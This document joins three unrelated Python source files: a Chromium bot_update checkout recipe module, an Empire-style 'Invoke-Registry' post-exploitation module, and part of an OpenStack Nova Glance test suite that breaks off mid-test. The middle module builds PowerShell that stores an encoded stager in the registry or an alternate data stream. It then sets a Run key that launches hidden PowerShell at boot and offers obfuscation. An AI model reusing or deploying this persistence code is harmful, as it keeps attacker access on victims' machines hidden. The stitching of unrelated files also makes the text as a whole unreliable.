def initialize(self):
assert len(self.m.buildbucket.build.input.gerrit_changes) <= 1, (
'bot_update does not support more than one '
'buildbucket.build.input.gerrit_changes')
def __call__(self, name, cmd, **kwargs):
"""Wrapper for easy calling of bot_update."""
assert isinstance(cmd, (list, tuple))
bot_update_path = self.resource('bot_update.py')
kwargs.setdefault('infra_step', True)
# If a Git HTTP request is constantly below GIT_HTTP_LOW_SPEED_LIMIT
# bytes/second for GIT_HTTP_LOW_SPEED_TIME seconds then such request will be
# aborted. Otherwise, it would wait for global timeout to be reached.
env = {
'GIT_HTTP_LOW_SPEED_LIMIT': '102400', # in bytes
'GIT_HTTP_LOW_SPEED_TIME': 300, # in seconds
}
with self.m.context(env=env):
with self.m.depot_tools.on_path():
return self.m.python(name, bot_update_path, cmd, **kwargs)
@property
def last_returned_properties(self):
return self._last_returned_properties
def _get_commit_repo_path(self, commit, gclient_config):
"""Returns local path to the repo that the commit is associated with.
The commit must be a self.m.buildbucket.common_pb2.GitilesCommit.
If commit does not specify any repo, returns name of the first solution.
Raises an InfraFailure if the commit specifies a repo unexpected by gclient.
"""
assert gclient_config.solutions, 'gclient_config.solutions is empty'
# if repo is not specified, choose the first solution.
if not (commit.host and commit.project):
return gclient_config.solutions[0].name
assert commit.host and commit.project
repo_url = self.m.gitiles.unparse_repo_url(commit.host, commit.project)
repo_path = self.m.gclient.get_repo_path(
repo_url, gclient_config=gclient_config)
if not repo_path:
raise self.m.step.InfraFailure(
'invalid (host, project) pair in '
'buildbucket.build.input.gitiles_commit: '
'(%r, %r) does not match any of configured gclient solutions '
'and not present in gclient_config.repo_path_map' % (
commit.host, commit.project))
return repo_path
def ensure_checkout(self,
gclient_config=None,
suffix=None,
patch=True,
update_presentation=True,
patch_root=None,
with_branch_heads=False,
with_tags=False,
no_fetch_tags=False,
refs=None,
patch_oauth2=None,
oauth2_json=None,
use_site_config_creds=None,
clobber=False,
root_solution_revision=None,
rietveld=None,
issue=None,
patchset=None,
gerrit_no_reset=False,
gerrit_no_rebase_patch_ref=False,
disable_syntax_validation=False,
manifest_name=None,
patch_refs=None,
ignore_input_commit=False,
set_output_commit=False,
step_test_data=None,
**kwargs):
"""
Args:
gclient_config: The gclient configuration to use when running bot_update.
If omitted, the current gclient configuration is used.
no_fetch_tags: When true, the root git repo being checked out will not
fetch any tags referenced from the references being fetched. When a repo
has many references, it can become a performance bottleneck, so avoid
tags if the checkout will not need them present.
disable_syntax_validation: (legacy) Disables syntax validation for DEPS.
Needed as migration paths for recipes dealing with older revisions,
such as bisect.
manifest_name: The name of the manifest to upload to LogDog. This must
be unique for the whole build.
ignore_input_commit: if True, ignore api.buildbucket.gitiles_commit.
Exists for historical reasons. Please do not use.
set_output_commit: if True, mark the checked out commit as the
primary output commit of this build, i.e. call
api.buildbucket.set_output_gitiles_commit.
In case of multiple repos, the repo is the one specified in
api.buildbucket.gitiles_commit or the first configured solution.
When sorting builds by commit position, this commit will be used.
Requires falsy ignore_input_commit.
step_test_data: a null function that returns test bot_update.py output.
Use test_api.output_json to generate test data.
"""
assert use_site_config_creds is None, "use_site_config_creds is deprecated"
assert rietveld is None, "rietveld is deprecated"
assert issue is None, "issue is deprecated"
assert patchset is None, "patchset is deprecated"
assert patch_oauth2 is None, "patch_oauth2 is deprecated"
assert oauth2_json is None, "oauth2_json is deprecated"
assert not (ignore_input_commit and set_output_commit)
refs = refs or []
# We can re-use the gclient spec from the gclient module, since all the
# data bot_update needs is already configured into the gclient spec.
cfg = gclient_config or self.m.gclient.c
assert cfg is not None, (
'missing gclient_config or forgot api.gclient.set_config(...) before?')
# Construct our bot_update command. This basically be inclusive of
# everything required for bot_update to know:
patch_root = patch_root or self.m.gclient.get_gerrit_patch_root(
gclient_config=cfg)
# Allow patched project's revision if necessary.
# This is important for projects which are checked out as DEPS of the
# gclient solution.
self.m.gclient.set_patch_repo_revision(cfg)
reverse_rev_map = self.m.gclient.got_revision_reverse_mapping(cfg)
flags = [
# What do we want to check out (spec/root/rev/reverse_rev_map).
['--spec-path', self.m.raw_io.input(
self.m.gclient.config_to_pythonish(cfg))],
['--patch_root', patch_root],
['--revision_mapping_file', self.m.json.input(reverse_rev_map)],
['--git-cache-dir', cfg.cache_dir],
['--cleanup-dir', self.m.path['cleanup'].join('bot_update')],
# Hookups to JSON output back into recipes.
['--output_json', self.m.json.output()],
]
# How to find the patch, if any
if patch:
repo_url = self.m.tryserver.gerrit_change_repo_url
fetch_ref = self.m.tryserver.gerrit_change_fetch_ref
target_ref = self.m.tryserver.gerrit_change_target_ref
if repo_url and fetch_ref:
flags.append([
'--patch_ref',
'%s@%s:%s' % (repo_url, target_ref, fetch_ref),
])
if patch_refs:
flags.extend(
['--patch_ref', patch_ref]
for patch_ref in patch_refs)
# Compute requested revisions.
revisions = {}
for solution in cfg.solutions:
if solution.revision:
revisions[solution.name] = solution.revision
# HACK: ensure_checkout API must be redesigned so that we don't pass such
# parameters. Existing semantics is too opiniated.
in_commit = self.m.buildbucket.gitiles_commit
in_commit_rev = in_commit.id or in_commit.ref
if not ignore_input_commit and in_commit_rev:
# Note: this is not entirely correct. build.input.gitiles_commit
# definition says "The Gitiles commit to run against.".
# However, here we ignore it if the config specified a revision.
# This is necessary because existing builders rely on this behavior,
# e.g. they want to force refs/heads/master at the config level.
in_commit_repo_path = self._get_commit_repo_path(in_commit, cfg)
revisions[in_commit_repo_path] = (
revisions.get(in_commit_repo_path) or in_commit_rev)
parsed_solution_urls = set(
self.m.gitiles.parse_repo_url(s.url) for s in cfg.solutions)
if (in_commit.id and in_commit.ref
and (in_commit.host, in_commit.project) in parsed_solution_urls):
refs = [in_commit.ref] + refs
# Guarantee that first solution has a revision.
# TODO(machenbach): We should explicitly pass HEAD for ALL solutions
# that don't specify anything else.
first_sol = cfg.solutions[0].name
revisions[first_sol] = revisions.get(first_sol) or 'HEAD'
if cfg.revisions:
# Only update with non-empty values. Some recipe might otherwise
# overwrite the HEAD default with an empty string.
revisions.update(
(k, v) for k, v in cfg.revisions.items() if v)
if cfg.solutions and root_solution_revision:
revisions[first_sol] = root_solution_revision
# Allow for overrides required to bisect into rolls.
revisions.update(self._deps_revision_overrides)
# Compute command-line parameters for requested revisions.
# Also collect all fixed revisions to simulate them in the json output.
# Fixed revision are the explicit input revisions of bot_update.py, i.e.
# every command line parameter "--revision name@value".
fixed_revisions = {}
for name, revision in sorted(revisions.items()):
fixed_revision = self.m.gclient.resolve_revision(revision)
if fixed_revision:
fixed_revisions[name] = fixed_revision
if fixed_revision.upper() == 'HEAD':
# Sync to correct destination ref if HEAD was specified.
fixed_revision = self._destination_ref(cfg, name)
# If we're syncing to a ref, we want to make sure it exists before
# trying to check it out.
if (fixed_revision.startswith('refs/') and
# TODO(crbug.com/874501): fetching additional refs is currently
# only supported for the root solution. We should investigate
# supporting it for other dependencies.
cfg.solutions and
cfg.solutions[0].name == name):
# Handle the "ref:revision" syntax, e.g.
# refs/branch-heads/4.2:deadbeef
refs.append(fixed_revision.split(':')[0])
flags.append(['--revision', '%s@%s' % (name, fixed_revision)])
for ref in refs:
assert not ref.startswith('refs/remotes/'), (
'The "refs/remotes/*" syntax is not supported.\n'
'The "remotes" syntax is dependent on the way the local repo is '
'configured, and while there are defaults that can often be '
'assumed, there is no guarantee the mapping will always be done in '
'a particular way.')
# Add extra fetch refspecs.
for ref in refs:
flags.append(['--refs', ref])
# Filter out flags that are None.
cmd = [item for flag_set in flags
for item in flag_set if flag_set[1] is not None]
if clobber:
cmd.append('--clobber')
if with_branch_heads or cfg.with_branch_heads:
cmd.append('--with_branch_heads')
if with_tags or cfg.with_tags:
cmd.append('--with_tags')
if gerrit_no_reset:
cmd.append('--gerrit_no_reset')
if no_fetch_tags:
cmd.append('--no_fetch_tags')
if gerrit_no_rebase_patch_ref:
cmd.append('--gerrit_no_rebase_patch_ref')
if disable_syntax_validation or cfg.disable_syntax_validation:
cmd.append('--disable-syntax-validation')
# Inject Json output for testing.
first_sln = cfg.solutions[0].name
step_test_data = step_test_data or (lambda: self.test_api.output_json(
patch_root, first_sln, reverse_rev_map, self._fail_patch,
fixed_revisions=fixed_revisions))
name = 'bot_update'
if not patch:
name += ' (without patch)'
if suffix:
name += ' - %s' % suffix
# Ah hah! Now that everything is in place, lets run bot_update!
step_result = None
try:
# 87 and 88 are the 'patch failure' codes for patch download and patch
# apply, respectively. We don't actually use the error codes, and instead
# rely on emitted json to determine cause of failure.
step_result = self(
name, cmd, step_test_data=step_test_data,
ok_ret=(0, 87, 88), **kwargs)
except self.m.step.StepFailure as f:
step_result = f.result
raise
finally:
if step_result and step_result.json.output:
result = step_result.json.output
self._last_returned_properties = result.get('properties', {})
if update_presentation:
# Set properties such as got_revision.
for prop_name, prop_value in (
self.last_returned_properties.items()):
step_result.presentation.properties[prop_name] = prop_value
# Add helpful step description in the step UI.
if 'step_text' in result:
step_text = result['step_text']
step_result.presentation.step_text = step_text
# Export the step results as a Source Manifest to LogDog.
source_manifest = result.get('source_manifest', {})
if manifest_name:
if not patch:
# The param "patched" is purely cosmetic to mean "if false, this
# bot_update run exists purely to unpatch an existing patch".
manifest_name += '_unpatched'
self.m.source_manifest.set_json_manifest(
manifest_name, source_manifest)
# Set output commit of the build.
if set_output_commit:
# As of April 2019, got_revision describes the output commit,
# the same commit that Build.output.gitiles_commit describes.
# In particular, users tend to set got_revision to make Milo display
# it. Derive output commit from got_revision.
out_commit = common_pb2.GitilesCommit(
id=self._last_returned_properties['got_revision'],
)
out_solution = reverse_rev_map['got_revision']
out_manifest = result['manifest'][out_solution]
assert out_manifest['revision'] == out_commit.id, (
out_manifest, out_commit.id)
out_commit.host, out_commit.project = (
self.m.gitiles.parse_repo_url(out_manifest['repository'])
)
# Determine the output ref.
got_revision_cp = self._last_returned_properties.get('got_revision_cp')
in_rev = revisions.get(out_solution)
if got_revision_cp:
# If commit position string is available, read the ref from there.
out_commit.ref, out_commit.position = (
self.m.commit_position.parse(got_revision_cp))
elif in_rev.startswith('refs/'):
# If we were asked to check out a specific ref, use it as output
# ref.
out_commit.ref = in_rev
elif in_rev == 'HEAD':
# bot_update.py interprets HEAD as refs/heads/master
out_commit.ref = 'refs/heads/master'
elif out_commit.id == in_commit.id and in_commit.ref:
# Derive output ref from the input ref.
out_commit.ref = in_commit.ref
else: # pragma: no cover
assert False, (
'Unsupposed case. '
'Call buildbucket.set_output_gitiles_commit directly.'
)
self.m.buildbucket.set_output_gitiles_commit(out_commit)
# Set the "checkout" path for the main solution.
# This is used by the Chromium module to figure out where to look for
# the checkout.
# If there is a patch failure, emit another step that said things
# failed.
if result.get('patch_failure'):
return_code = result.get('patch_apply_return_code')
patch_body = result.get('failed_patch_body')
try:
if return_code == 3:
# This is download failure, hence an infra failure.
with self.m.context(infra_steps=True):
self.m.python.failing_step(
'Patch failure', 'Git reported a download failure')
else:
# This is actual patch failure.
self.m.tryserver.set_patch_failure_tryjob_result()
self.m.cq.set_do_not_retry_build()
self.m.python.failing_step(
'Patch failure', 'See attached log. Try rebasing?')
except self.m.step.StepFailure as e:
if patch_body:
e.result.presentation.logs['patch error'] = (
patch_body.splitlines())
raise e
# bot_update actually just sets root to be the folder name of the
# first solution.
if (result.get('did_run')
and 'checkout' not in self.m.path
and 'root' in result):
co_root = result['root']
cwd = self.m.context.cwd or self.m.path['start_dir']
self.m.path['checkout'] = cwd.join(*co_root.split(self.m.path.sep))
return step_result
def _destination_ref(self, cfg, path):
"""Returns the ref branch of a CL for the matching project if available or
HEAD otherwise.
If there's no Gerrit CL associated with the run, returns 'HEAD'.
Otherwise this queries Gerrit for the correct destination ref, which
might differ from refs/heads/master.
Args:
cfg: The used gclient config.
path: The DEPS path of the project this prefix is for. E.g. 'src' or
'src/v8'. The query will only be made for the project that matches
the CL's project.
Returns:
A destination ref as understood by bot_update.py if available
and if different from refs/heads/master, returns 'HEAD' otherwise.
"""
# Ignore project paths other than the one belonging to the current CL.
patch_path = self.m.gclient.get_gerrit_patch_root(gclient_config=cfg)
if patch_path:
patch_path = patch_path.replace(self.m.path.sep, '/')
if not patch_path or path != patch_path:
return 'HEAD'
target_ref = self.m.tryserver.gerrit_change_target_ref
if target_ref == 'refs/heads/master':
return 'HEAD'
return target_ref
def resolve_fixed_revision(self, bot_update_json, name):
"""Set a fixed revision for a single dependency using project revision
properties.
"""
rev_properties = self.get_project_revision_properties(name)
self.m.gclient.c.revisions = {
name: bot_update_json['properties'][rev_properties[0]]
}
def _resolve_fixed_revisions(self, bot_update_json):
"""Set all fixed revisions from the first sync to their respective
got_X_revision values.
If on the first sync, a revision was requested to be HEAD, this avoids
using HEAD potentially resolving to a different revision on the second
sync. Instead, we sync explicitly to whatever was checked out the first
time.
Example (chromium trybot used with v8 patch):
First sync was called with
bot_update.py --revision src@abc --revision src/v8@HEAD
Fixed revisions are: src, src/v8
Got_revision_mapping: src->got_revision, src/v8->got_v8_revision
got_revision = abc, got_v8_revision = deadbeef
Second sync will be called with
bot_update.py --revision src@abc --revision src/v8@deadbeef
Example (chromium trybot used with chromium DEPS change, changing v8 from
"v8_before" to "v8_after"):
First sync was called with
bot_update.py --revision src@abc
Fixed revisions are: src
Got_revision_mapping: src->got_revision, src/v8->got_v8_revision
got_revision = abc, got_v8_revision = v8_after
Second sync will be called with
bot_update.py --revision src@abc
When deapplying the patch, v8 will be synced to v8_before.
"""
for name in bot_update_json.get('fixed_revisions', {}):
rev_properties = self.get_project_revision_properties(name)
if (rev_properties and
bot_update_json['properties'].get(rev_properties[0])):
self.m.gclient.c.revisions[name] = str(
bot_update_json['properties'][rev_properties[0]])
# TODO(machenbach): Replace usages of this method eventually by direct calls
# to the manifest output.
def get_project_revision_properties(self, project_name, gclient_config=None):
"""Returns all property names used for storing the checked-out revision of
a given project.
Args:
project_name (str): The name of a checked-out project as deps path, e.g.
src or src/v8.
gclient_config: The gclient configuration to use. If omitted, the current
gclient configuration is used.
Returns (list of str): All properties that'll hold the checked-out revision
of the given project. An empty list if no such properties exist.
"""
cfg = gclient_config or self.m.gclient.c
# Sort for determinism. We might have several properties for the same
# project, e.g. got_revision and got_webrtc_revision.
rev_reverse_map = self.m.gclient.got_revision_reverse_mapping(cfg)
return sorted(
prop
for prop, project in rev_reverse_map.items()
if project == project_name
)
def deapply_patch(self, bot_update_step):
"""Deapplies a patch, taking care of DEPS and solution revisions properly.
"""
bot_update_json = bot_update_step.json.output
# We only override first solution here to make sure that we correctly revert
# changes to DEPS file, which is particularly important for auto-rolls. It
# is also imporant that we do not assume that corresponding revision is
# stored in the 'got_revision' as some gclient configs change the default
# mapping for their own purposes.
first_solution_name = self.m.gclient.c.solutions[0].name
rev_property = self.get_project_revision_properties(first_solution_name)[0]
self.m.gclient.c.revisions[first_solution_name] = str(
bot_update_json['properties'][rev_property])
self._resolve_fixed_revisions(bot_update_json)
self.ensure_checkout(
patch=False, no_fetch_tags=True, update_presentation=False)
|
|
import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Registry',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) via the HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run '
'registry key. This has an easy detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'KeyName' : {
'Description' : 'Key name for the run trigger.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
# trigger options
keyName = self.options['KeyName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "Remove-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+";"
script += "'Registry persistence removed.'"
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
# store the script in the specified alternate data stream location
if adsPath != '':
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''more < "+adsPath+"\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath + "."
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "$((gp "+path+" "+name+")."+name+")"
script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";powershell -Win Hidden -enc $x\"';"
script += "'Registry persistence established "+statusMsg+"'"
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import random
import time
import glanceclient.exc
from nova import context
from nova import exception
from nova.image import glance
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests.glance import stubs as glance_stubs
class NullWriter(object):
"""Used to test ImageService.get which takes a writer object"""
def write(self, *arg, **kwargs):
pass
class TestGlanceSerializer(test.TestCase):
def test_serialize(self):
metadata = {'name': 'image1',
'is_public': True,
'foo': 'bar',
'properties': {
'prop1': 'propvalue1',
'mappings': [
{'virtual': 'aaa',
'device': 'bbb'},
{'virtual': 'xxx',
'device': 'yyy'}],
'block_device_mapping': [
{'virtual_device': 'fake',
'device_name': '/dev/fake'},
{'virtual_device': 'ephemeral0',
'device_name': '/dev/fake0'}]}}
converted_expected = {
'name': 'image1',
'is_public': True,
'foo': 'bar',
'properties': {
'prop1': 'propvalue1',
'mappings':
'[{"device": "bbb", "virtual": "aaa"}, '
'{"device": "yyy", "virtual": "xxx"}]',
'block_device_mapping':
'[{"virtual_device": "fake", "device_name": "/dev/fake"}, '
'{"virtual_device": "ephemeral0", '
'"device_name": "/dev/fake0"}]'}}
converted = glance._convert_to_string(metadata)
self.assertEqual(converted, converted_expected)
self.assertEqual(glance._convert_from_string(converted), metadata)
class TestGlanceImageService(test.TestCase):
"""
Tests the Glance image service.
At a high level, the translations involved are:
1. Glance -> ImageService - This is needed so we can support
multple ImageServices (Glance, Local, etc)
2. ImageService -> API - This is needed so we can support multple
APIs (OpenStack, EC2)
"""
NOW_GLANCE_OLD_FORMAT = "2010-10-11T10:30:22"
NOW_GLANCE_FORMAT = "2010-10-11T10:30:22.000000"
class tzinfo(datetime.tzinfo):
@staticmethod
def utcoffset(*args, **kwargs):
return datetime.timedelta()
NOW_DATETIME = datetime.datetime(2010, 10, 11, 10, 30, 22, tzinfo=tzinfo())
def setUp(self):
super(TestGlanceImageService, self).setUp()
fakes.stub_out_compute_api_snapshot(self.stubs)
client = glance_stubs.StubGlanceClient()
self.service = self._create_image_service(client)
self.context = context.RequestContext('fake', 'fake', auth_token=True)
def _create_image_service(self, client):
def _fake_create_glance_client(context, host, port, use_ssl, version):
return client
self.stubs.Set(glance, '_create_glance_client',
_fake_create_glance_client)
client_wrapper = glance.GlanceClientWrapper(
'fake', 'fake_host', 9292)
return glance.GlanceImageService(client=client_wrapper)
@staticmethod
def _make_fixture(**kwargs):
fixture = {'name': None,
'properties': {},
'status': None,
'is_public': None}
fixture.update(kwargs)
return fixture
def _make_datetime_fixture(self):
return self._make_fixture(created_at=self.NOW_GLANCE_FORMAT,
updated_at=self.NOW_GLANCE_FORMAT,
deleted_at=self.NOW_GLANCE_FORMAT)
def test_create_with_instance_id(self):
"""Ensure instance_id is persisted as an image-property"""
fixture = {'name': 'test image',
'is_public': False,
'properties': {'instance_id': '42', 'user_id': 'fake'}}
image_id = self.service.create(self.context, fixture)['id']
image_meta = self.service.show(self.context, image_id)
expected = {
'id': image_id,
'name': 'test image',
'is_public': False,
'size': None,
'min_disk': None,
'min_ram': None,
'disk_format': None,
'container_format': None,
'checksum': None,
'created_at': self.NOW_DATETIME,
'updated_at': self.NOW_DATETIME,
'deleted_at': None,
'deleted': None,
'status': None,
'properties': {'instance_id': '42', 'user_id': 'fake'},
'owner': None,
}
self.assertDictMatch(image_meta, expected)
image_metas = self.service.detail(self.context)
self.assertDictMatch(image_metas[0], expected)
def test_create_without_instance_id(self):
"""
Ensure we can create an image without having to specify an
instance_id. Public images are an example of an image not tied to an
instance.
"""
fixture = {'name': 'test image', 'is_public': False}
image_id = self.service.create(self.context, fixture)['id']
expected = {
'id': image_id,
'name': 'test image',
'is_public': False,
'size': None,
'min_disk': None,
'min_ram': None,
'disk_format': None,
'container_format': None,
'checksum': None,
'created_at': self.NOW_DATETIME,
'updated_at': self.NOW_DATETIME,
'deleted_at': None,
'deleted': None,
'status': None,
'properties': {},
'owner': None,
}
actual = self.service.show(self.context, image_id)
self.assertDictMatch(actual, expected)
def test_create(self):
fixture = self._make_fixture(name='test image')
num_images = len(self.service.detail(self.context))
image_id = self.service.create(self.context, fixture)['id']
self.assertNotEquals(None, image_id)
self.assertEquals(num_images + 1,
len(self.service.detail(self.context)))
def test_create_and_show_non_existing_image(self):
fixture = self._make_fixture(name='test image')
image_id = self.service.create(self.context, fixture)['id']
self.assertNotEquals(None, image_id)
self.assertRaises(exception.ImageNotFound,
self.service.show,
self.context,
'bad image id')
def test_detail_private_image(self):
fixture = self._make_fixture(name='test image')
fixture['is_public'] = False
properties = {'owner_id': 'proj1'}
fixture['properties'] = properties
self.service.create(self.context, fixture)['id']
proj = self.context.project_id
self.context.project_id = 'proj1'
image_metas = self.service.detail(self.context)
self.context.project_id = proj
self.assertEqual(1, len(image_metas))
self.assertEqual(image_metas[0]['name'], 'test image')
self.assertEqual(image_metas[0]['is_public'], False)
def test_detail_marker(self):
fixtures = []
ids = []
for i in range(10):
fixture = self._make_fixture(name='TestImage %d' % (i))
fixtures.append(fixture)
ids.append(self.service.create(self.context, fixture)['id'])
image_metas = self.service.detail(self.context, marker=ids[1])
self.assertEquals(len(image_metas), 8)
i = 2
for meta in image_metas:
expected = {
'id': ids[i],
'status': None,
'is_public': None,
'name': 'TestImage %d' % (i),
'properties': {},
'size': None,
'min_disk': None,
'min_ram': None,
'disk_format': None,
'container_format': None,
'checksum': None,
'created_at': self.NOW_DATETIME,
'updated_at': self.NOW_DATETIME,
'deleted_at': None,
'deleted': None,
'owner': None,
}
self.assertDictMatch(meta, expected)
i = i + 1
def test_detail_limit(self):
fixtures = []
ids = []
for i in range(10):
fixture = self._make_fixture(name='TestImage %d' % (i))
fixtures.append(fixture)
ids.append(self.service.create(self.context, fixture)['id'])
image_metas = self.service.detail(self.context, limit=5)
self.assertEquals(len(image_metas), 5)
def test_detail_default_limit(self):
fixtures = []
ids = []
for i in range(10):
fixture = self._make_fixture(name='TestImage %d' % (i))
fixtures.append(fixture)
ids.append(self.service.create(self.context, fixture)['id'])
image_metas = self.service.detail(self.context)
for i, meta in enumerate(image_metas):
self.assertEqual(meta['name'], 'TestImage %d' % (i))
def test_detail_marker_and_limit(self):
fixtures = []
ids = []
for i in range(10):
fixture = self._make_fixture(name='TestImage %d' % (i))
fixtures.append(fixture)
ids.append(self.service.create(self.context, fixture)['id'])
image_metas = self.service.detail(self.context, marker=ids[3], limit=5)
self.assertEquals(len(image_metas), 5)
i = 4
for meta in image_metas:
expected = {
'id': ids[i],
'status': None,
'is_public': None,
'name': 'TestImage %d' % (i),
'properties': {},
'size': None,
'min_disk': None,
'min_ram': None,
'disk_format': None,
'container_format': None,
'checksum': None,
'created_at': self.NOW_DATETIME,
'updated_at': self.NOW_DATETIME,
'deleted_at': None,
'deleted': None,
'owner': None,
}
self.assertDictMatch(meta, expected)
i = i + 1
def test_detail_invalid_marker(self):
fixtures = []
ids = []
for i in range(10):
fixture = self._make_fixture(name='TestImage %d' % (i))
fixtures.append(fixture)
ids.append(self.service.create(self.context, fixture)['id'])
self.assertRaises(exception.Invalid, self.service.detail,
self.context, marker='invalidmarker')
def test_update(self):
fixture = self._make_fixture(name='test image')
image = self.service.create(self.context, fixture)
print image
image_id = image['id']
fixture['name'] = 'new image name'
self.service.update(self.context, image_id, fixture)
new_image_data = self.service.show(self.context, image_id)
self.assertEquals('new image name', new_image_data['name'])
def test_delete(self):
fixture1 = self._make_fixture(name='test image 1')
fixture2 = self._make_fixture(name='test image 2')
fixtures = [fixture1, fixture2]
num_images = len(self.service.detail(self.context))
self.assertEquals(0, num_images)
ids = []
for fixture in fixtures:
new_id = self.service.create(self.context, fixture)['id']
ids.append(new_id)
num_images = len(self.service.detail(self.context))
self.assertEquals(2, num_images)
self.service.delete(self.context, ids[0])
num_images = len(self.service.detail(self.context))
self.assertEquals(1, num_images)
def test_show_passes_through_to_client(self):
fixture = self._make_fixture(name='image1', is_public=True)
image_id = self.service.create(self.context, fixture)['id']
image_meta = self.service.show(self.context, image_id)
expected = {
'id': image_id,
'name': 'image1',
'is_public': True,
'size': None,
'min_disk': None,
'min_ram': None,
'disk_format': None,
'container_format': None,
'checksum': None,
'created_at': self.NOW_DATETIME,
'updated_at': self.NOW_DATETIME,
'deleted_at': None,
'deleted': None,
'status': None,
'properties': {},
'owner': None,
}
self.assertEqual(image_meta, expected)
def test_show_raises_when_no_authtoken_in_the_context(self):
fixture = self._make_fixture(name='image1',
is_public=False,
properties={'one': 'two'})
image_id = self.service.create(self.context, fixture)['id']
self.context.auth_token = False
self.assertRaises(exception.ImageNotFound,
self.service.show,
self.context,
image_id)
def test_detail_passes_through_to_client(self):
fixture = self._make_fixture(name='image10', is_public=True)
image_id = self.service.create(self.context, fixture)['id']
image_metas = self.service.detail(self.context)
expected = [
{
'id': image_id,
'name': 'image10',
'is_public': True,
'size': None,
'min_disk': None,
'min_ram': None,
'disk_format': None,
'container_format': None,
'checksum': None,
'created_at': self.NOW_DATETIME,
'updated_at': self.NOW_DATETIME,
'deleted_at': None,
'deleted': None,
'status': None,
'properties': {},
